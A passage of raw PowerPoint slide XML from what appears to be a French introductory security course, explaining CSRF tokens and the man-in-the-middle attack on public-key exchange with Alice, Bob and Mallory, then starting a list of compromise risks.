                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Si c’est un formulaire, le jeton CSRF est inséré dans le corps du formulaire (dans un input de type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sinon, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c’est lors de la génération du lien vers l’action que le jeton sera généré, stocké en session et ajouté dans l’URL en tant que paramètre.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n jeton invalide empêchera le traitement des données envoyées par le formulaire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il est aussi possible de vérifier le header HTTP Origin, d’utiliser un captcha, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13847043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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="477254"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D6C93A-6E94-4E36-BD16-6717EF086A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2844734" y="2083690"/>
            <a:ext cx="6502532" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="34000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’attaque MITM a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pour but d'intercepter les communications entre deux parties, sans que ni l'une ni l'autre ne puisse se douter que le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2" tooltip="Canal de communication">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>canal de communication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entre elles a été compromis.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59149F45-1D18-4E56-9748-A136A7C9CE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31272" y="3793126"/>
            <a:ext cx="3309257" cy="20476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86791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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="477254"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2C094A-D3BA-4E0C-A003-29AF3A3AB0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684210" y="1871572"/>
            <a:ext cx="7676019" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2" tooltip="Alice et Bob">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Alice et Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> veulent échanger des données confidentielles, et Malory, veut les intercepter. Ils possèdent chacun une clé privée (respectivement As, Bs et Ms) et une clé publique (respectivement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE228AA9-5658-4393-A92B-69213D94D1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50290" y="3998992"/>
            <a:ext cx="2857500" cy="1914525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46AA977F-6077-4093-8754-3199FAFF3DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684210" y="3662990"/>
            <a:ext cx="7432053" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dans le cas normal :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice et Bob échangent leur clé publique.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Si Alice veut envoyer un message à Bob, elle chiffre ce message avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Bob le déchiffre avec Bs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, qui ne possède que Ms, ne peut pas lire le message.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42690580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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="477254"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D5D304-6C3F-47EC-B0D5-87FC71EAFBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647129" y="2287318"/>
            <a:ext cx="10897741" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bob envoie sa clé publique à Alice. Mallory l'intercepte, et renvoie à Alice sa propre clé publique (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) en se faisant passer pour Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lorsque Alice veut envoyer un message à Bob, elle utilise donc, sans le savoir, la clé publique de Mallory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice chiffre le message avec la clé publique de Mallory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) et l'envoie à celui qu'elle croit être Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> intercepte le message, le déchiffre avec sa clé privée (Ms) et peut lire le message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Puis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> chiffre à nouveau le message avec la clé publique de Bob (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bob déchiffre son message avec sa clé privée (Bs), et ne se doute de rien puisque cela fonctionne.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ainsi, Alice et Bob sont chacun persuadés d'utiliser la clé de l'autre, alors qu'ils utilisent en réalité tous les deux la clé de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507CA81D-CFAD-414B-81DF-8A1DD80B9F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1756950"/>
            <a:ext cx="9913032" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maintenant Mallory est en mesure de modifier les échanges entre Alice et Bob</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="602646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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="9928824" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Risques de compromission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B14427F-3B6F-4744-8519-A20A524041D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="2481777"/>
            <a:ext cx="5287963" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Infection par malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Déni de service (DDoS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
